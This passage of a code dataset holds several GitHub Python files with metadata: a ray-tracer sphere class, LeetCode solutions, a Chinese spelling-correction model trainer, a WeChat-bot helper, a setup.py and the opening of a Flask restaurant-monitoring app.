worldZ):\n\n # return a vector from my centre to the world point worldX, worldY, worldZ\n\n # object point is the point transformed to object space\n # objectPoint = inverse(self.transform) * world point\n\n worldPoint = rtPoint.rtPoint(worldX, worldY, worldZ)\n\n objectPointMatrix = self.transform().inverse().multiplyWithAnother(worldPoint.matrix.transpose()).transpose()\n objectPoint = rtPoint.rtPoint()\n objectPoint.matrix = objectPointMatrix\n\n objectNormal = objectPoint.subtractAnotherFromMe(rtPoint.rtPoint())\n\n worldNormalMatrix = self.transform().inverse().transpose().multiplyWithAnother(objectNormal.matrix.transpose()).transpose()\n\n worldNormal = rtVector.rtVector()\n worldNormal.matrix = worldNormalMatrix\n\n return worldNormal\n\n\n \n def showMe(self, label=''):\n\n if len(label) > 0:\n print ('**** %s ****' % label)\n print ('origin')\n self.sOrigin.showMe()\n print ('radius %s' % str(self.sRadius))\n self.sTransform.showMe('Transform')\n self.sMaterial.showMe('Material')\n \n\n def asDictionary(self):\n\n res = {'Sphere': {}}\n res['Sphere']['origin'] = self.origin().asDictionary()\n res['Sphere']['radius'] = self.radius()\n res['Sphere']['id'] = self.sObjectID\n return res\n\n 
\n","repo_name":"glennnichollsubisense/rayTracing","sub_path":"rtSphere.py","file_name":"rtSphere.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38901679151","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 849.py\n# @Time : 2020/4/23 23:19\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n @timeit\n def maxDistToClosest(self, seats: List[int]) -> int:\n n = len(seats)\n a = [0] * n\n last = 0 if a[0] == 1 else -1\n for i in range(n):\n if seats[i] == 1:\n last = i\n a[i] = n\n else:\n a[i] = n if last == -1 else i - last\n last = n-1 if a[-1] == 1 else -1\n for i in range(n-1, -1, -1):\n if last == -1:\n pass\n else:\n a[i] = min(a[i], last - i)\n if seats[i] == 1:\n last = i\n a[i] = n\n for i in range(n):\n if a[i] == n:\n a[i] = -1\n return max(a)\n\nif __name__ == '__main__':\n a = Solution()\n a.maxDistToClosest([1,0,0,0,1,0,1])\n a.maxDistToClosest([1,0,0,0])\n a.maxDistToClosest([0,0,1])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/601-900/849.py","file_name":"849.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"16666090657","text":"\"\"\"\n@Time : 2021-01-21 10:57:33\n@File : csc_trainer.py\n@Author : okcd00, Abtion\n@Email : okcd00@qq.com\n\"\"\"\n\nimport os\nimport gc \nimport time\nimport psutil\nimport numpy as np\nfrom copy import deepcopy\nfrom pprint import pprint\nfrom mem_top import mem_top\nfrom collections import defaultdict\n\nimport torch\nfrom transformers import BertTokenizer\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom urllib.parse import quote\nfrom bbcm.utils import flatten\nfrom bbcm.utils.text_utils import (split_2_short_text, convert_to_unicode, is_chinese_char)\nfrom bbcm.data.loaders.collator import DataCollatorForCsc\nfrom bbcm.utils.evaluations import (compute_detector_prf, \n compute_corrector_prf,\n compute_sentence_level_prf, \n report_prf)\nfrom bbcm.engine.bases import BaseTrainingEngine\n\n\ndef show_memory_allocates():\n results = mem_top(\n limit=15, width=128, sep='\\n',\n refs_format='{num}\\t{type} {obj}', \n bytes_format='{num}\\t {obj}', \n types_format='{num}\\t {obj}',\n verbose_types=None, \n verbose_file_name='/tmp/mem_top')\n print(results)\n\n\nclass CscTrainingModel(BaseTrainingEngine):\n \"\"\"\n 用于CSC的BaseModel, 定义了训练及预测步骤\n \"\"\"\n stanford_model_path = r'/home/chendian/download/stanford-corenlp-4.2.2/'\n\n def __init__(self, cfg, *args, **kwargs):\n super().__init__(cfg, *args, **kwargs)\n self.cfg = cfg\n self.timer = []\n self.debug = False\n self.memory_leak_test = True\n\n # model\n self.w = float(cfg.MODEL.HYPER_PARAMS[0]) # loss weight for cor & det\n self.output_type = 'logits'\n self.tokenizer = BertTokenizer.from_pretrained(cfg.MODEL.BERT_CKPT)\n # self.tokenizer._add_tokens(['“', '”'])\n\n # for inference\n self.entity_recognizer = None\n self.vocab_pinyin = None\n self.collator = None\n\n # threshold for prediction judgment\n self.judge_line = 0.5\n self.has_explict_detector = True\n self.show_result_steps = int(1e4) # 10k steps per hour\n\n # record lists\n self.train_loss_epoch = []\n self.train_loss_window = []\n \n # (mean, count) case\n self.train_det_f1_case = []\n self.train_cor_f1_case = [] \n\n # record matrix\n self.count_matrix_epoch = None\n self.count_matrix = None\n 
self.reset_matrix_epoch()\n self.reset_matrix() \n\n # logging\n self.board_writer = None\n self.recorder = defaultdict(int)\n self.tb_writer = SummaryWriter(cfg.OUTPUT_DIR + '/tensorboard_logs/')\n\n # process info\n self.process = psutil.Process(os.getpid())\n\n @staticmethod\n def pt2list(_tensor):\n ret = _tensor.cpu().numpy().tolist()\n return ret\n\n def init_collator(self): \n return DataCollatorForCsc(\n cfg=self.cfg, tokenizer=self.tokenizer, need_pinyin=True)\n\n def load_vocab_pinyin(self):\n return [line.strip() for line in open(\n os.path.join(self.cfg.MODEL.DATA_PATH, 'vocab_pinyin.txt'))]\n\n def update_mean_value(self, case, val, cnt=1):\n if len(case) != 2:\n val_mean, val_count = 0., 0.\n else: \n val_mean, val_count = case[0], case[1]\n val_mean = (val_mean * val_count + val * cnt) / (val_count + cnt)\n val_count += cnt\n return [val_mean, val_count]\n\n def record_time(self, information):\n \"\"\"\n @param information: information that describes the time point.\n \"\"\"\n self.timer.append((information, time.time()))\n\n def show_timer_trainer(self, to_print=True):\n if not self.timer:\n return []\n phase, start_t = self.timer[0]\n logs = []\n time_str = time.strftime(\"%H:%M:%S\", time.gmtime(start_t))\n logs.append(f\"{phase}\\t{time_str}\")\n for phase, t in self.timer[1:]:\n logs.append(f\"{phase}\\t{t - start_t}\")\n if to_print:\n for line in logs:\n self.print(line)\n return logs \n\n def init_entity_recognizer(self):\n from stanfordcorenlp import StanfordCoreNLP\n stanford_model_path = self.stanford_model_path\n\n self.print(f\"Now loading NER model from {stanford_model_path}\")\n stanford_model = StanfordCoreNLP(stanford_model_path, lang='zh', quiet=True)\n self.entity_recognizer = stanford_model\n # usage: word_tags = stanford_model.ner(quote(str))\n\n def logging_all(self, item, name, record_tb=False):\n if self.trainer.is_global_zero:\n self._logger.info(f'{name}: {item}')\n self.log(f'{name}', item)\n if record_tb:\n self.tb_writer.add_scalar(f'{name}', item, self.recorder[f'{name}'])\n # auto indexing\n self.recorder[f'{name}'] += 1\n\n def update_matrix(self, details):\n count_matrix = {}\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n if key + '_counts' in details:\n tp, fp, fn = deepcopy(self.count_matrix[f\"{key}_counts\"])\n _tp, _fp, _fn = deepcopy(details[f\"{key}_counts\"])\n count_matrix[f\"{key}_counts\"] = [tp+_tp, fp+_fp, fn+_fn]\n self.count_matrix = count_matrix\n\n def reset_matrix(self):\n count_matrix = {}\n flag = False\n if self.count_matrix is None:\n flag = True\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n if not flag:\n tp, fp, fn = deepcopy(self.count_matrix_epoch[f\"{key}_counts\"])\n _tp, _fp, _fn = deepcopy(self.count_matrix[f\"{key}_counts\"])\n self.count_matrix_epoch[f\"{key}_counts\"] = [tp+_tp, fp+_fp, fn+_fn]\n count_matrix[f\"{key}_counts\"] = [0, 0, 0] # [TP, FP, FN]\n self.count_matrix = deepcopy(count_matrix)\n del count_matrix\n\n def reset_matrix_epoch(self):\n count_matrix_epoch = {}\n for key in ['det_char', 'cor_char', 'det_sent', 'cor_sent']:\n count_matrix_epoch[f\"{key}_counts\"] = [0, 0, 0] # [TP, FP, FN]\n self.count_matrix_epoch = count_matrix_epoch\n\n def print_prf_for_fusion_matrix(self, n_step, output_key=None, count_matrix=None):\n # output_key is a list or a string\n results = {} \n if output_key is None:\n output_key = ['cor_sent']\n if count_matrix is None:\n count_matrix = self.count_matrix\n for key in count_matrix:\n if self.w == 0. 
and 'cor_' in key:\n continue\n phase = f\"{key.replace('_counts', '')} at {n_step}-th steps\"\n if n_step == 0:\n phase = f\"{key.replace('_counts', '')} at epoch end.\"\n tp, fp, fn = deepcopy(count_matrix[key])\n _logger = self._logger if self.trainer.is_global_zero else None\n precision, recall, f1_score = report_prf(\n tp, fp, fn, logger=_logger, phase=phase)\n if key.replace('_counts', '') in output_key:\n results[key.replace('_counts', '')] = (precision, recall, f1_score)\n return results\n\n def get_encoded_texts(self, texts):\n if texts is None:\n return None\n encoded_texts = self.tokenizer(texts, padding=True, return_tensors='pt')\n encoded_texts_cuda = encoded_texts.to(self._device)\n del encoded_texts # try to explictly delete, instead of overwrite on same var_name.\n return encoded_texts_cuda \n\n def get_results_from_outputs(self, outputs, batch, output_type=None):\n if output_type is None:\n output_type = self.output_type \n # batch: 原句,纠正句,错误位置\n ori_text, cor_text, det_y = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出(logits),纠错输出(logits)\n # outputs: 检错输出(prob),纠错输出(prob),拼音输出(prob)\n det_output, cor_output = outputs[2], outputs[3]\n\n if det_output is None:\n det_prob = None\n elif output_type.startswith('logit'):\n det_prob = torch.sigmoid(det_output).squeeze(-1)\n elif output_type.startswith('prob'): # 'prob':\n det_prob = det_output.squeeze(-1)\n else:\n raise ValueError(\"Invalid output type:\", str(output_type))\n \n # (batch_size, sequence_length)\n # the judge_line is allowed not to be 0.5.\n if det_output is not None:\n det_pred = det_prob > self.judge_line\n det_y_hat = det_pred.to(self._device).long()\n\n # (batch_size, sequence_length)\n if cor_output is not None:\n encoded_y = self.get_encoded_texts(cor_text)\n cor_y_hat = torch.argmax(cor_output, dim=-1)\n cor_y_hat *= encoded_y['attention_mask']\n cor_y = encoded_y['input_ids']\n\n results = []\n for _idx, src in enumerate(ori_text):\n # [CLS] [1: len(text)+1] [SEP] [PAD]s\n _src = list(self.tokenizer(src, add_special_tokens=False)['input_ids'])\n if self.memory_leak_test:\n __src = deepcopy(_src)\n del _src\n _src = __src\n\n # whether a token from correction is the same as the truth token.\n if cor_output is None:\n c_tgt = c_predict = [0] * len(_src)\n else:\n # tgt, predict = cor_y[_idx], cor_y_hat[_idx]\n c_tgt = self.pt2list(cor_y[_idx][1: len(_src) + 1])\n c_predict = self.pt2list(cor_y_hat[_idx][1: len(_src) + 1])\n\n # whether a token from detection is the same as the truth token.\n if det_output is None:\n d_tgt = d_predict = [0] * len(_src)\n else:\n # det_label, det_predict = det_y[_idx], det_y_hat[_idx]\n d_tgt = self.pt2list(det_y[_idx][1: len(_src) + 1])\n d_predict = self.pt2list(det_y_hat[_idx][1: len(_src) + 1])\n\n # a tuple of lists, all token_ids\n results.append((_src, c_tgt, c_predict, d_tgt, d_predict))\n\n # results for calculating PRF\n return results\n\n def show_train_windows(self, n_step=0, is_epoch_end=False):\n results = self.print_prf_for_fusion_matrix(\n n_step=n_step, \n output_key=['det_sent', 'cor_sent'],\n ) # det_sent/cor_sent\n _, _, _det_f = results.get('det_sent', (0., 0., 0.))\n _, _, _cor_f = results.get('cor_sent', (0., 0., 0.))\n avg_trn_loss = self.train_loss_window[0] if self.train_loss_window else 0.\n \n # logger info\n self.logging_all(avg_trn_loss, name='average_train_loss')\n self.logging_all(_det_f, name='average_train_det_f1')\n self.logging_all(_cor_f, name='average_train_cor_f1')\n self.train_loss_window = []\n self.reset_matrix() # reset for next 
round\n\n if is_epoch_end:\n print(\"[{}] The validation on {}th epoch's starts.\".format(\n self._device, self.current_epoch))\n # micro\n _det_f1 = self.train_det_f1_case[0] if self.train_det_f1_case else 0.\n _cor_f1 = self.train_cor_f1_case[0] if self.train_cor_f1_case else 0.\n self.logging_all(_det_f1, name='train_det_f1_epoch', record_tb=True)\n self.logging_all(_cor_f1, name='train_cor_f1_epoch', record_tb=True)\n self.train_det_f1_case = []\n self.train_cor_f1_case = []\n # macro\n results = self.print_prf_for_fusion_matrix(\n n_step=n_step, \n output_key=['det_sent', 'cor_sent'],\n count_matrix=self.count_matrix_epoch,\n ) # det_sent/cor_sent\n _, _, _det_f1 = results.get('det_sent', (0., 0., 0.))\n _, _, _cor_f1 = results.get('cor_sent', (0., 0., 0.))\n self.logging_all(_det_f1, name='train_det_macro_f1_epoch', record_tb=True)\n self.logging_all(_cor_f1, name='train_cor_macro_f1_epoch', record_tb=True)\n self.reset_matrix_epoch()\n else: # reduce space complexity\n self.train_det_f1_case = self.update_mean_value(\n case=self.train_det_f1_case, val=_det_f)\n self.train_cor_f1_case = self.update_mean_value(\n case=self.train_cor_f1_case, val=_cor_f)\n del results\n \n if self.trainer.is_global_zero:\n show_memory_allocates() # covers gc.collect()\n else:\n gc.collect()\n self.print(f\"Step {n_step}: memory {self.process.memory_info().rss // 1000000} MB\")\n\n # @profile\n def training_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch\n # outputs: 检错loss,纠错loss,检错logits,纠错logits\n if not batch:\n return 0.\n if self.debug:\n self.record_time(f'batch {batch_idx}')\n \n outputs = self.forward(*batch)\n det_loss, cor_loss = outputs[0], outputs[1]\n d_loss = det_loss.item() if torch.is_tensor(det_loss) else det_loss\n c_loss = cor_loss.item() if torch.is_tensor(cor_loss) else cor_loss\n if False and d_loss < c_loss and self.w < 0.5:\n # 先学好 det_loss,再注重学 cor_loss,所以 w 一般设置 < 0.5\n loss = (1 - self.w) * cor_loss + self.w * det_loss \n else: # learn more for detection as default\n loss = self.w * cor_loss + (1. - self.w) * det_loss\n \n if self.show_result_steps > 0:\n # record results\n results = self.get_results_from_outputs(\n outputs, batch, output_type='logits')\n details = compute_corrector_prf(results, logger=None) \n if self.has_explict_detector:\n details_det = compute_detector_prf(results, logger=None)\n for _key, _value in details_det.items():\n details[_key] = _value\n self.update_matrix(details)\n del details_det, details\n \n _loss = loss.item()\n self.train_loss_window = self.update_mean_value(\n case=self.train_loss_window, val=_loss)\n # curr_epoch = self.current_epoch\n # curr_step = self.global_step\n self.tb_writer.add_scalar('train_loss', _loss, self.global_step)\n if self.w < 1. and False: # reduce writer CPU memory capacity\n self.tb_writer.add_scalar('train_det_loss', d_loss, self.global_step)\n if self.w > 0. 
and False: # reduce writer CPU memory capacity\n self.tb_writer.add_scalar('train_cor_loss', c_loss, self.global_step)\n\n # show results for every k steps\n if batch_idx > 0 and self.show_result_steps != -1:\n # self.log('global_step', self.global_step)\n if batch_idx % self.show_result_steps == 0:\n _val, _cnt = self.train_loss_window\n self.train_loss_epoch = self.update_mean_value(\n case=self.train_loss_epoch,\n val=_val, cnt=_cnt)\n # the train_loss_window will be cleaned after show func\n self.show_train_windows(n_step=batch_idx)\n if self.memory_leak_test:\n gc.collect()\n return loss\n\n def validation_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出,纠错输出\n with torch.no_grad():\n outputs = self.forward(*batch)\n det_loss, cor_loss = outputs[:2]\n d_loss = det_loss.item() if torch.is_tensor(det_loss) else det_loss\n c_loss = cor_loss.item() if torch.is_tensor(cor_loss) else cor_loss\n if False and d_loss < c_loss and self.w < 0.5:\n loss = (1 - self.w) * c_loss + self.w * d_loss \n else: # learn more for detection as default\n loss = self.w * c_loss + (1 - self.w) * d_loss\n\n results = self.get_results_from_outputs(\n outputs, batch, output_type='logits')\n return loss, d_loss, c_loss, results\n\n def validation_epoch_end(self, outputs, log_detail_dict=False, is_testing=False):\n results = []\n\n logs = self.show_timer_trainer(to_print=False)\n if logs:\n with open(\"./logs_220811.txt\", 'a') as f:\n for line in logs:\n f.write(f\"{line}\\n\")\n logs = []\n\n # loss, d_loss, c_loss, results\n for out in outputs:\n # a list of (_src, c_tgt, c_predict, d_tgt, d_predict)\n results += out[-1]\n loss = np.mean([out[0] for out in outputs])\n det_loss = np.mean([out[1] for out in outputs])\n cor_loss = np.mean([out[2] for out in outputs])\n if self.memory_leak_test:\n del outputs\n \n # record and refresh train loss case (the last-k-steps)\n if not is_testing:\n # testing phase has no logs from training\n if len(self.train_loss_window) > 0:\n _val, _cnt = self.train_loss_window\n self.train_loss_epoch = self.update_mean_value(\n case=self.train_loss_epoch, \n val=_val, cnt=_cnt)\n self.train_loss_window = []\n self.show_train_windows( # epoch ends\n n_step=0, is_epoch_end=True)\n if len(self.train_loss_epoch) > 0:\n train_loss_epoch = self.train_loss_epoch[0]\n self.logging_all(train_loss_epoch, name='train_loss_epoch')\n\n # measure functions\n details = compute_corrector_prf(results, logger=self._logger)\n if self.has_explict_detector:\n details_det = compute_detector_prf(results, logger=None)\n for _key, _value in details_det.items():\n details[_key] = _value\n if self.memory_leak_test:\n del details_det\n # pprint({k: v for k, v in details_det.items() if 'det' in k})\n if self.memory_leak_test:\n del results\n pprint({k: v for k, v in details.items()})\n # take sent-level as the targeted measure.\n det_f1, cor_f1 = details['det_sent_f1'], details['cor_sent_f1']\n det_acc, cor_acc = details['det_sent_acc'], details['cor_sent_acc']\n\n # logger info\n if not is_testing:\n # testing phase has no rest logs from training\n self.logging_all(self.current_epoch, 'epoch')\n self.logging_all(loss, 'valid_loss')\n if self.w < 1.:\n self.logging_all(det_loss, 'valid_det_loss')\n if self.w > 0.:\n self.logging_all(cor_loss, 'valid_cor_loss')\n\n # detailed log_dict of performance\n if log_detail_dict:\n log_dict = {k: v for k, v in details.items() if not k.endswith('_counts')}\n counts_offset = ['TP', 'FP', 'FN']\n for key in details:\n 
if key.endswith('_counts'):\n for i, num in enumerate(details[key]):\n log_dict[f\"{key}_{counts_offset[i]}\"] = num\n # details[key] = np.array(details[key], dtype=int)\n self.log_dict(deepcopy(log_dict), logger=True)\n if self.memory_leak_test:\n del log_dict\n if self.memory_leak_test:\n del details # values still remains\n\n print(\"[{}] The validation on {}th epoch's ends.\".format(\n self._device, self.current_epoch))\n print(f\"Detection Acc: {det_acc}, Detection F1: {det_f1}\")\n print(f\"Correction Acc: {cor_acc}, Correction F1: {cor_f1}\")\n return det_acc, cor_acc, det_f1, cor_f1\n\n def test_step(self, batch, batch_idx):\n # ori_text, cor_text, det_labels = batch[:3]\n # outputs: 检错loss,纠错loss,检错输出,纠错输出\n with torch.no_grad():\n outputs = self.forward(*batch)\n \n results = self.get_results_from_outputs(\n outputs, batch, output_type='prob')\n return 0., 0., 0., results\n\n def test_epoch_end(self, outputs):\n det_acc, cor_acc, det_f1, cor_f1 = self.validation_epoch_end(\n outputs, log_detail_dict=True, is_testing=True)\n print(\"[{}] The Test on {}th epoch's ends.\".format(\n self._device, self.current_epoch))\n print(f\"Detection Acc: {det_acc}, Detection F1: {det_f1}\")\n print(f\"Correction Acc: {cor_acc}, Correction F1: {cor_f1}\")\n self.tb_writer.close()\n return det_acc, cor_acc, det_f1, cor_f1\n \n def generate_pinyin_inputs_for_predict(self, texts):\n encoded_err = self.get_encoded_texts(texts)\n if self.collator is None:\n self.collator = self.init_collator()\n pinyin_lists = self.collator.generate_pinyin_labels(\n token_ids=encoded_err['input_ids'], texts=texts,\n similar_pinyins=False, in_batch=True)\n pinyin_inputs = torch.from_numpy(\n np.stack(pinyin_lists)).squeeze(-1)\n return pinyin_inputs\n\n def generate_ignore_mask_for_predict(self, texts):\n # the mask consists of 0(normal) and 1(ignore)\n if isinstance(texts, list):\n mask_case = [self.generate_ignore_mask_for_predict(text) for text in texts]\n max_len = max(map(len, mask_case))\n mask_case = [1 - np.pad(msk, (0, (max_len-len(msk)))) for msk in mask_case]\n return torch.from_numpy(np.stack(mask_case))\n\n def judge_valid_token_for_csc(token):\n if token.startswith('##'):\n token = token[2:]\n if len(token) > 1:\n return 0 # invalid\n if is_chinese_char(ord(token)):\n return 1 # valid\n return 0 # invalid\n\n def mark_entities(ignore_case, tok_case, _text):\n pivot = 1\n char_to_word_idx = []\n for tok_idx, tok in enumerate(tok_case):\n if tok.startswith('##'):\n tok = tok[2:]\n for c in tok:\n char_to_word_idx.append(tok_idx)\n char_to_word_idx.append(len(tok_case)) # end\n rest_str = f\"{_text}\"\n if self.entity_recognizer is None:\n self.init_entity_recognizer()\n _entities = self.entity_recognizer.ner(quote(texts))\n # print(char_to_word_idx)\n for word, tag in _entities:\n if tag in ['O', 'TITLE']:\n continue\n # print(word, tag)\n offset = rest_str.index(word) + len(word) \n # print(offset)\n pivot += offset\n # print(pivot, pivot-len(word), pivot)\n ignore_case[char_to_word_idx[pivot-len(word)]: char_to_word_idx[pivot-1]+1] = 0\n # print(pivot+1, pivot+1+len(word), ignore_case)\n rest_str = rest_str[offset:]\n # print(rest_str)\n return ignore_case \n\n tok_case = self.tokenizer.tokenize(convert_to_unicode(texts))\n # [CLS] ... 
[SEP]\n ignore_case = np.array([0] + [judge_valid_token_for_csc(tok) for tok in tok_case] + [0]) \n ignore_case = mark_entities(ignore_case, tok_case, texts)\n return ignore_case\n\n def convert_ids_to_pinyins(self, ids):\n if self.vocab_pinyin is None:\n self.vocab_pinyin = self.load_vocab_pinyin()\n return [self.vocab_pinyin[_id] for _id in ids]\n\n def predict(self, texts, detail=False, \n predict_shorter=False, unk_sign='֍', det_labels=None, det_mask=None):\n from bbcm.utils.text_utils import clean_text\n if not isinstance(texts, list): \n # single string without a list container\n texts = [texts]\n texts = [clean_text(text).lower() for text in texts]\n \n if predict_shorter: # split long strings into substrings\n texts = [split_2_short_text(text) for text in texts]\n texts = [_sentence for _sentence, _idx in texts]\n parts_rec = [len(text_case) for text_case in texts]\n texts = flatten(texts)\n \n inputs = self.tokenizer(\n texts, padding=True, return_tensors='pt')\n inputs.to(self.cfg.MODEL.DEVICE)\n \n with torch.no_grad():\n pinyin_inputs = None\n if 'pinyin' in self.cfg.MODEL.ENCODER_TYPE:\n pinyin_inputs = self.generate_pinyin_inputs_for_predict(texts)\n if 'gold' not in self.cfg.MODEL.MERGE_MASK_TYPE:\n # during training, det_mask is given for gold mask\n # during inference, det_mask is None for soft mask\n det_labels = None\n \n # if det_mask is None:\n # det_mask = self.generate_ignore_mask_for_predict(texts)\n\n # outputs: 检错loss,纠错loss,检错logits,纠错logits\n outputs = self.forward(\n texts=texts, \n cor_labels=None, # testset has no cor_labels\n det_labels=det_labels,\n pinyin_inputs=pinyin_inputs, \n confusion_mask=None, # generated by the model\n det_mask=det_mask, # generate by the trainer\n )\n \n # 检测 prob,纠错 prob [, pinyin output]\n # (batch_size, sequence_length)\n # (batch_size, sequence_length, vocab_size)\n # 检错loss,纠错loss,检错输出,纠错输出\n det_prob, cor_prob, pinyin_prob = outputs[2:5]\n if self.cfg.MODEL.PREDICT_PINYINS:\n # (batch_size, sequence_length, pinyin_vocab_size)\n y_pinyins = torch.argmax(pinyin_prob, dim=-1).cpu().numpy()\n expand_text_lens = torch.sum(\n inputs['attention_mask'], dim=-1) - 1\n \n prob_detection = []\n prob_correction = []\n results_detection = []\n results_text, results_pinyin = [], []\n results_tokens = []\n\n if cor_prob is not None:\n y_tokens = torch.argmax(cor_prob, dim=-1).cpu().numpy()\n if det_prob is not None:\n det_prob = det_prob.cpu().numpy()\n y_detection = (det_prob > self.judge_line)\n\n for sent_idx, t_len in enumerate(expand_text_lens):\n original_text = texts[sent_idx]\n original_tokens = self.tokenizer.tokenize(original_text)\n\n # correction\n _y_hat = y_tokens[sent_idx]\n predict_tokens = self.tokenizer.convert_ids_to_tokens(_y_hat[1: t_len])\n predict_tokens = [_tok if _tok != '[UNK]' else unk_sign for _tok in predict_tokens]\n # predict_text = self.tokenizer.convert_tokens_to_string(predict_tokens).replace(' ', '')\n \n for tok_idx, (original_tok, pred_tok) in enumerate(zip(original_tokens, predict_tokens)):\n if pred_tok == '[UNK]': \n predict_tokens[tok_idx] = original_tok # re-use the original text\n if pred_tok.startswith('##'):\n predict_tokens[tok_idx] = predict_tokens[tok_idx][2:]\n\n predict_text = \"\".join(predict_tokens)\n results_text.append(predict_text)\n results_tokens.append(predict_tokens)\n\n # also predict detection\n if det_prob is not None:\n prob_detection.append(det_prob[sent_idx][1: t_len])\n results_detection.append(y_detection[sent_idx][1: t_len])\n\n # also predict pinyin\n if 
self.cfg.MODEL.PREDICT_PINYINS:\n _y_pinyin = y_pinyins[sent_idx]\n predict_pinyins = self.convert_ids_to_pinyins(_y_pinyin[1: t_len])\n predict_pinyins = [_tok if _tok != '[UNK]' else unk_sign \n for _tok in predict_pinyins]\n results_pinyin.append(predict_pinyins)\n\n def join_shorter_results(_results):\n rst_temp = []\n pivot = 0\n for case_len in parts_rec:\n rst_temp.append(flatten(_results[pivot: pivot+case_len]))\n _results = rst_temp\n return _results\n\n # concat substrings\n if predict_shorter: \n prob_detection = join_shorter_results(prob_detection)\n results_detection = join_shorter_results(results_detection)\n results_text = join_shorter_results(results_text)\n results_pinyin = join_shorter_results(results_pinyin)\n\n if detail:\n max_length = max(map(len, prob_detection))\n prob_detection = np.stack(\n [np.concatenate([p, np.zeros(max_length-len(p))]) \n for p in prob_detection])\n prob_detection = np.around(prob_detection, decimals=5)\n results_detection = np.concatenate(results_detection)\n detail_info = {\n 'detection_prob': prob_detection,\n 'detection': results_detection,\n 'text': results_tokens, # 'correction'\n 'pinyin': results_pinyin,\n }\n return results_text, detail_info\n return results_text\n\n","repo_name":"okcd00/CDConfusor","sub_path":"exp/bert_based_models/engine/csc_trainer.py","file_name":"csc_trainer.py","file_ext":"py","file_size_in_byte":29371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2771161968","text":"from more_action import *\nfrom file_action import *\nfrom standard_print import printerr\n\n\ndef nickname(wxid_group):\n #update_group_member_details(port,wxid,wxid_group)\n wxid_de=get_wxid_details(wxid_group)\n nickname=wxid_de[\"data\"][\"nickName\"]\n return nickname\ndef wxid_form_cr(wxid,sender):\n if \"@chatroom\" in wxid:\n cda=get_chatroom_details_all(wxid)\n for x in cda['data']:\n if x[\"NickName\"] == sender or x[\"Alias\"] == sender or x[\"RoomNick\"] == sender:\n return x[\"UserName\"]\n else:\n printerr(\"Error for wxid is must be chatroom(wxid_form_cr)\")\n return\n \n","repo_name":"zwx08/Chino-wechat-bot","sub_path":"another_action_base.py","file_name":"another_action_base.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"669255287","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name='intrinsic_hardness',\n version='0.0.1',\n author='Salil Bavdekar',\n author_email='salil.bavdekar@ufl.edu',\n description='Calculate intrinsic hardness of structures',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/salil91/intrinsic-hardness',\n project_urls={\n \"Bug Tracker\": \"https://github.com/salil91/intrinsic-hardness/issues\"\n },\n license='MIT',\n packages=['intrinsic_hardness'],\n install_requires=['pymatgen', 'click'],\n)\n","repo_name":"salil91/intrinsic-hardness","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1590434955","text":"class Solution:\n\n def letterCombinations(self, digits):\n \"\"\"\n 此题不用递归略有难度\n 核心算法为DFS\n :param digits:\n :return:\n \"\"\"\n refer_dict = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n 
'6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']\n }\n if digits == \"\":\n return []\n if len(digits) == 1:\n return refer_dict.get(digits[0])\n\n def dfs(num, string, rst):\n if num == length:\n rst.append(string)\n return None\n for letter in refer_dict.get(digits[num]):\n dfs(num + 1, string + letter, rst)\n\n rst = []\n length = len(digits)\n dfs(0, '', rst)\n return rst\n\n\nprint(Solution().letterCombinations('23'))\n\n","repo_name":"luanshiyinyang/LeetCode","sub_path":"0017-Letter Combinations of a Phone Number.py","file_name":"0017-Letter Combinations of a Phone Number.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"30035826509","text":"from flask import Flask, jsonify, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime, timedelta\nfrom datetime import datetime, timezone\nfrom flask_migrate import Migrate\nimport pytz\nimport csv\nimport uuid\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:SQLRakesh2022@127.0.0.1:3306/restaurantmonitor'\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n# Define the database models\nclass storetimezone(db.Model):\n store_id = db.Column(db.String(25), primary_key=True)\n timezone_str = db.Column(db.String(100))\n\nclass pollingdata(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n store_id = db.Column(db.String(25), db.ForeignKey('storetimezone.store_id'))\n timestamp_utc = db.Column(db.String(30)) \n status = db.Column(db.String(10))\n\nclass businesshours(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n store_id = db.Column(db.String(25), db.ForeignKey('storetimezone.store_id'))\n day_of_week = db.Column(db.Integer)\n start_time_local = db.Column(db.String(8))\n end_time_local = db.Column(db.String(8))\n\nclass report(db.Model):\n report_id = db.Column(db.String(50), primary_key=True)\n status = db.Column(db.String(20))\n file_path = db.Column(db.String(100))\n\n# Load data from CSV files and populate the database\ndef load_data_from_csv():\n # Load store data from timezone.csv\n with app.app_context():\n with open('store_timezone.csv', 'r') as file:\n reader = 